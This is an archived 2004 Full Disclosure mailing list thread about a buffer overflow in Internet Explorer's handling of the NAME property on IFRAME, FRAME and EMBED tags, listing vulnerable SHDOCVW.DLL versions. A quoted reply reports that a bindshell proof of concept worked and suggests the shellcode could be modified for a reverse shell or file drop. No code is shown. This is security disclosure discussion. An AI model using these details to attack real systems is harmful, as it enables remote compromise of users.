Full Disclosure mailing list archives
Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))
From: "Berend-Jan Wever" <skylined () edup tudelft nl>
Date: Mon, 8 Nov 2004 02:14:31 +0100
Hmmm... MSDN DHTML Reference mentions 6 different flavors of the NAME property: 1) For a lot of tags like A, APPLET, IMG, INPUT, etc... this includes EMBED 2) FRAME, FRAMESET, IFRAME 3) META 4) namespace 5) PARAM 6) window I figured all the tags mentioned under 2 were affected and the rest wasn't. Now I hear <EMBED> is also working ? Somebody might wanna go through each and every tag to see which are affected and which aren't. SHDOCVW.DLL version 6.0.2800.1400 and 6.0.2800.1584 are known to be vulnerable. SHDOCVW.DLL version 6.00.2900.2518 seems to be immune to the BoF (ships with XP PRO SP2). The immune version got me wondering if they knew about the bug ? If not, did they expect the code could be buggy and just rewrote it to be sure it was safe for SP2 ? Or was there just a code rewrite or another reason why the bug got silently fixed...? I hope they fixed it by accident, seeing what the other option would imply. Cheers, SkyLined ----- Original Message ----- From: "Menashe Eliezer" <menashe () finjan com> To: "Berend-Jan Wever" <skylined () edup tudelft nl>; <full-disclosure () lists netsys com> Sent: Sunday, November 07, 2004 23:21 Subject: RE: [Full-disclosure] MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))
The published exploit is working also with the <EMBED> tag, and not just with the <IFRAME> and the <FRAME> tags. Finjan's advisory can be found at: http://www.finjan.com/SecurityLab/AttackandExploitReports/alert_show.asp ?attack_release_id=114 == Regards, Menashe Eliezer Senior application security architect Malicious Code Research Center Finjan Software http://www.finjan.com/mcrc Prevention is the best cure! -----Original Message----- From: morning_wood [mailto:se_cur_ity () hotmail com] Sent: Tuesday, November 02, 2004 3:44 PM To: Berend-Jan Wever; full-disclosure () lists netsys com; bugtraq () securityfocus com Subject: Re: [Full-disclosure] MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) bindshell success ( html run from local ) connect from remote success... this is NASTY if shellcode modified this will do reverse or exe drop i assume.... good work, Donnie Werner ----------------------------------------------- This message was scanned for malicious content and viruses by Finjan Internet Vital Security 1Box(tm) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Berend-Jan Wever (Nov 01)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) morning_wood (Nov 02)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Georgi Guninski (Nov 09)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) pachiderme pachiderme (Nov 09)
- <Possible follow-ups>
- RE: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Menashe Eliezer (Nov 07)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Berend-Jan Wever (Nov 07)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) patryn (Nov 08)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Valdis . Kletnieks (Nov 08)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Jim Geovedi (Nov 09)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Berend-Jan Wever (Nov 07)